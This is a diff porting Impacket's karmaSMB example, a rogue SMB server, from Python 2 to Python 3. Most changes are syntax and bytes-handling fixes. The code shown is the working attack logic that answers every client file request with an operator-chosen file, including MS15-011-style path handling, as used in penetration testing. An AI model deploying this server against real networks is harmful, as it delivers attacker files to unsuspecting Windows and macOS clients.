@@ -1,5 +1,5 @@
-#!/usr/bin/python
-# Copyright (c) 2016 CORE Security Technologies
+#!/usr/bin/env python
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
 #
 # This software is provided under under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -49,13 +49,17 @@
 #       hosting. *CAREFUL!!!*
 #
 
-
+from __future__ import division
+from __future__ import print_function
 import sys
 import os
 import argparse
 import logging
 import ntpath
-import ConfigParser
+try:
+    import ConfigParser
+except ImportError:
+    import configparser as ConfigParser
 from threading import Thread
 
 from impacket.examples import logger
@@ -134,7 +138,7 @@ class KarmaSMBServer(Thread):
         self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
 
         # Now we have to register the MS-SRVS server. This specially important for 
-        # Windows 7+ and Mavericks clients since they WONT (specially OSX) 
+        # Windows 7+ and Mavericks clients since they WON'T (specially OSX) 
         # ask for shares using MS-RAP.
 
         self.__srvsServer = SRVSServer()
@@ -144,9 +148,9 @@ class KarmaSMBServer(Thread):
     def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
         connData = smbServer.getConnectionData(connId)
 
-        respSetup = ''
-        respParameters = ''
-        respData = ''
+        respSetup = b''
+        respParameters = b''
+        respData = b''
         findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
 
         # 1. Let's grab the extension and map the file's contents we will deliver
@@ -156,19 +160,19 @@ class KarmaSMBServer(Thread):
         _, origPathNameExtension = os.path.splitext(origPathName)
         origPathNameExtension = origPathNameExtension.upper()[1:]
 
-        if self.extensions.has_key(origPathNameExtension.upper()):
+        if origPathNameExtension.upper() in self.extensions:
             targetFile = self.extensions[origPathNameExtension.upper()]
         else:
             targetFile = self.defaultFile
 
-        if connData['ConnectedShares'].has_key(recvPacket['Tid']):
+        if recvPacket['Tid'] in connData['ConnectedShares']:
             path = connData['ConnectedShares'][recvPacket['Tid']]['path']
 
             # 2. We call the normal findFirst2 call, but with our targetFile
             searchResult, searchCount, errorCode = findFirst2(path, 
                           targetFile, 
                           findFirst2Parameters['InformationLevel'], 
-                          findFirst2Parameters['SearchAttributes'] )
+                          findFirst2Parameters['SearchAttributes'], pktFlags = recvPacket['Flags2'] )
 
             respParameters = smb.SMBFindFirst2Response_Parameters()
             endOfSearch = 1
@@ -192,7 +196,7 @@ class KarmaSMBServer(Thread):
                     if len(connData['SIDs']) == 0:
                        sid = 1
                     else:
-                       sid = connData['SIDs'].keys()[-1] + 1
+                       sid = list(connData['SIDs'].keys())[-1] + 1
                     # Store the remaining search results in the ConnData SID
                     connData['SIDs'][sid] = searchResult[i[0]:]
                     respParameters['LastNameOffset'] = totalData
@@ -253,14 +257,14 @@ class KarmaSMBServer(Thread):
         _, origPathNameExtension = os.path.splitext(origPathName)
         origPathNameExtension = origPathNameExtension.upper()[1:]
 
-        if self.extensions.has_key(origPathNameExtension.upper()):
+        if origPathNameExtension.upper() in self.extensions:
             targetFile = self.extensions[origPathNameExtension.upper()]
         else:
             targetFile = self.defaultFile
         
         # 2. We change the filename in the request for our targetFile
         ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
-        SMBCommand['Data'] = str(ntCreateAndXData)
+        SMBCommand['Data'] = ntCreateAndXData.getData()
         smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
 
         # 3. We call the original call with our modified data
@@ -273,31 +277,31 @@ class KarmaSMBServer(Thread):
         
         connData = smbServer.getConnectionData(connId)
 
-        respSetup = ''
-        respParameters = ''
-        respData = ''
+        respSetup = b''
+        respParameters = b''
+        respData = b''
         errorCode = 0
 
         queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
 
-        if connData['ConnectedShares'].has_key(recvPacket['Tid']):
+        if recvPacket['Tid'] in connData['ConnectedShares']:
             path = ''
             try:
                origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
                origPathName = os.path.normpath(origPathName.replace('\\','/'))
 
-               if connData.has_key('MS15011') is False:
+               if ('MS15011' in connData) is False:
                    connData['MS15011'] = {}
 
                smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
-               if connData['MS15011'].has_key(origPathName) or origPathName == '.':
+               if origPathName in connData['MS15011'] or origPathName == '.':
                    # We already processed this entry, now it's asking for a directory
                    infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
                else:
                    # First time asked, asking for the file
                    infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
                    connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
-            except Exception, e:
+            except Exception as e:
                #import traceback
                #traceback.print_exc()
                smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
@@ -363,7 +367,7 @@ class KarmaSMBServer(Thread):
 
         # Are we being asked for a directory?
         if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
-            if self.extensions.has_key(origPathNameExtension.upper()):
+            if origPathNameExtension.upper() in self.extensions:
                 targetFile = self.extensions[origPathNameExtension.upper()]
             else:
                 targetFile = self.defaultFile
@@ -379,7 +383,7 @@ class KarmaSMBServer(Thread):
             import sys
             ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le')
         ntCreateRequest['NameLength'] = len(targetFile)*2
-        recvPacket['Data'] = str(ntCreateRequest)
+        recvPacket['Data'] = ntCreateRequest.getData()
 
         # 3. We call the original call with our modified data
         return self.origsmb2Create(connId, smbServer, recvPacket)
@@ -393,7 +397,7 @@ class KarmaSMBServer(Thread):
         #queryDirectoryRequest   = smb2.SMB2QueryDirectory(recvPacket['Data'])
 
         errorCode = 0xff
-        respSMBCommand['Buffer'] = '\x00' 
+        respSMBCommand['Buffer'] = b'\x00'
 
         errorCode = STATUS_SUCCESS
 
@@ -419,7 +423,7 @@ class KarmaSMBServer(Thread):
             infoRecord['LastAccessTime']    = getFileTime(atime)
             infoRecord['LastWriteTime']     = getFileTime(mtime)
             infoRecord['LastChangeTime']    = getFileTime(mtime)
-            infoRecord['ShortName']         = '\x00'*24
+            infoRecord['ShortName']         = b'\x00'*24
             #infoRecord['FileName']          = os.path.basename(origName).encode('utf-16le')
             infoRecord['FileName']          = origName.encode('utf-16le')
             padLen = (8-(len(infoRecord) % 8)) % 8
@@ -427,7 +431,7 @@ class KarmaSMBServer(Thread):
 
             respSMBCommand['OutputBufferOffset'] = 0x48
             respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
-            respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
+            respSMBCommand['Buffer'] = infoRecord.getData() + b'\xaa'*padLen
             connData['MS15011']['FindDone'] = True
 
         smbServer.setConnectionData(connId, connData)
@@ -453,7 +457,7 @@ class KarmaSMBServer(Thread):
         errorCode = STATUS_SUCCESS
 
         ## Process here the request, does the share exist?
-        path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
+        path = recvPacket.getData()[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
         UNCOrShare = path.decode('utf-16le')
 
         # Is this a UNC?
@@ -473,7 +477,7 @@ class KarmaSMBServer(Thread):
             if len(connData['ConnectedShares']) == 0:
                tid = 1
             else:
-               tid = connData['ConnectedShares'].keys()[-1] + 1
+               tid = list(connData['ConnectedShares'].keys())[-1] + 1
             connData['ConnectedShares'][tid] = share
             connData['ConnectedShares'][tid]['path'] = '/'
             connData['ConnectedShares'][tid]['shareName'] = path
@@ -506,7 +510,8 @@ class KarmaSMBServer(Thread):
 
         resp = smb.NewSMBPacket()
         resp['Flags1'] = smb.SMB.FLAGS1_REPLY
-        resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
+        resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \
+                         recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
 
         resp['Tid'] = recvPacket['Tid']
         resp['Mid'] = recvPacket['Mid']
@@ -543,7 +548,7 @@ class KarmaSMBServer(Thread):
         if len(connData['ConnectedShares']) == 0:
            tid = 1
         else:
-           tid = connData['ConnectedShares'].keys()[-1] + 1
+           tid = list(connData['ConnectedShares'].keys())[-1] + 1
         connData['ConnectedShares'][tid] = share
         connData['ConnectedShares'][tid]['path'] = '/'
         connData['ConnectedShares'][tid]['shareName'] = path
@@ -557,7 +562,7 @@ class KarmaSMBServer(Thread):
         else:
             respData['Service']               = path
         respData['PadLen']                = 0
-        respData['NativeFileSystem']      = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
+        respData['NativeFileSystem']      = encodeSMBString(recvPacket['Flags2'], 'NTFS' ).decode()
 
         respSMBCommand['Parameters']             = respParameters
         respSMBCommand['Data']                   = respData 
@@ -589,11 +594,14 @@ class KarmaSMBServer(Thread):
 if __name__ == '__main__':
     # Init the example's logger theme
     logger.init()
-    print version.BANNER
-    parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will return the pathname contents")
+    print(version.BANNER)
+    parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will "
+                                                                     "return the pathname contents")
     parser.add_argument("--help", action="help", help='show this help message and exit')
-    parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB clients")
-    parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map extensions to files to deliver. For those extensions not present, pathname will be delivered')
+    parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB "
+                                                                               "clients")
+    parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map '
+                        'extensions to files to deliver. For those extensions not present, pathname will be delivered')
     parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
 
 
@@ -603,7 +611,7 @@ if __name__ == '__main__':
 
     try:
        options = parser.parse_args()
-    except Exception, e:
+    except Exception as e:
        logging.critical(str(e))
        sys.exit(1)
 
@@ -622,4 +630,3 @@ if __name__ == '__main__':
             sys.exit(1)
         else:
             pass
-
